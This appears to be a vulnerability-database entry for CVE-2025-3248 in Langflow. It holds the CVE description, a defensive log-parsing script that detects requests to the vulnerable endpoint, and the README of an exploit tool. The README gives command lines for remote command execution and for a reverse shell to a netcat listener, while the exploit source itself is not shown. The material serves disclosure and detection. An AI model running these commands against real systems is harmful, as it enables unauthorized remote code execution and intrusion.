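Related vulnerability
Title: Langflow Security Vulnerability (CVE-2025-3248)
Description: Langflow is an open-source visual framework from Langflow for building multi-agent and RAG applications. Versions of Langflow before 1.3.0 contain a security vulnerability: the /api/v1/validate/code endpoint is subject to code injection, which may allow a remote unauthenticated attacker to execute arbitrary code.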
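For defenders, the description above gives two checkable facts: the affected version range (before 1.3.0) and the endpoint (`/api/v1/validate/code`). The following is an added example, not part of this repository's `exploit.py`; it assumes a reverse proxy in front of Langflow that writes combined-format access logs, and the log lines and function names are constructed for illustration.

```python
import re
from collections import defaultdict

ENDPOINT = "/api/v1/validate/code"   # endpoint named in the CVE description
FIXED = (1, 3, 0)                    # versions before 1.3.0 are affected

# Constructed sample lines (assumption: combined log format from a reverse
# proxy; the addresses are documentation ranges, not real hosts).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Apr/2025:08:14:02 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 312 "-" "python-requests/2.31.0"
192.0.2.10 - - [10/Apr/2025:08:14:05 +0000] "GET /api/v1/flows/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Apr/2025:08:14:09 +0000] "POST /api/v1/validate/code?x=1 HTTP/1.1" 200 298 "-" "python-requests/2.31.0"
203.0.113.44 - - [10/Apr/2025:08:15:30 +0000] "POST /api/v1/validate/code/ HTTP/1.1" 401 58 "-" "curl/8.5.0"
192.0.2.10 - - [10/Apr/2025:08:16:00 +0000] "POST /api/v1/login HTTP/1.1" 200 410 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
    r'\S+ "[^"]*" "(?P<ua>[^"]*)"'
)

def is_affected(version):
    """True when a Langflow version string is older than 1.3.0 (suffixes ignored)."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    parts += [0] * (3 - len(parts))
    return tuple(parts) < FIXED

def find_validate_code_hits(log_text):
    """Group POSTs to the validate/code endpoint by client IP."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["target"].split("?", 1)[0].rstrip("/")  # normalise query and slash
        if path == ENDPOINT:
            hits[m["ip"]].append((m["ts"], int(m["status"]), m["ua"]))
    return dict(hits)

def successful_sources(hits):
    """Client IPs that got at least one 2xx: a lead for review, not proof of compromise."""
    return sorted(ip for ip, rows in hits.items()
                  if any(200 <= status < 300 for _, status, _ in rows))

if __name__ == "__main__":
    hits = find_validate_code_hits(SAMPLE_LOG)
    print(hits)
    print("2xx sources:", successful_sources(hits))
```

On an instance where `is_affected` returns true, prioritise the sources returned by `successful_sources` for host-level review and upgrade to 1.3.0 or later.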
Description
This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit.
Introduction
# Authenticated CVE-2025-3248 Langflow Remote Code Execution
This Python script exploits **CVE-2025-3248** to execute arbitrary commands or spawn a reverse shell on a vulnerable system.
**Authentication is required** to use this exploit.
---
## Features
- **Authenticated Command Execution:** Run arbitrary system commands on the target.
- **Reverse Shell:** Spawn a reverse shell to your listener.
- **Proxy Support:** Route requests through a proxy (e.g., Burp Suite).
---
## Requirements
- Python 3.x
- `requests` library
Install dependencies with:
```bash
pip install requests
```
---
## Usage
```bash
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
```
### Arguments
| Argument | Description | Required |
|------------------|--------------------------------------------------|----------|
| `-u`, `--url` | Target base URL (e.g., `https://target.com`) | Yes |
| `-l`, `--login` | Admin username | Yes |
| `-p`, `--password` | Admin password | Yes |
| `-c`, `--command`| Command to execute on the target | No* |
| `--proxy` | Proxy URL (e.g., `http://127.0.0.1:8080`) | No |
| `--lhost` | Local host for reverse shell | No* |
| `--lport` | Local port for reverse shell | No* |
\* You must specify either a command (`-c`) or both `--lhost` and `--lport` for a reverse shell.
---
### Examples
#### 1. Execute a Command
```bash
python3 exploit.py -u https://target.com -l admin -p password -c "id"
```
#### 2. Get a Reverse Shell
Start a listener on your machine:
```bash
nc -lvnp 4444
```
Then run:
```bash
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
```
#### 3. Use a Proxy
```bash
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
```
---
## Docker image
### Deploying the image
You can deploy the Docker image using the following command:
```bash
podman compose up -d
```
The running container will be reachable at `http://localhost:7860`.
Credits for the compose file: [This repository](https://github.com/vulhub/vulhub/tree/master/langflow/CVE-2025-3248)
---
## Disclaimer
This script is for **educational and authorized penetration testing** purposes only.
**Do not use against systems you do not own or have explicit permission to test.**
---
This readme is AI generated.
File snapshot
[4.0K] /data/pocs/d57e189345d697f0925d95e11feca04b80aba1cd
├── [4.0K] docker
│ └── [ 313] docker-compose.yml
├── [4.8K] exploit.py
└── [2.6K] README.md
1 directory, 3 files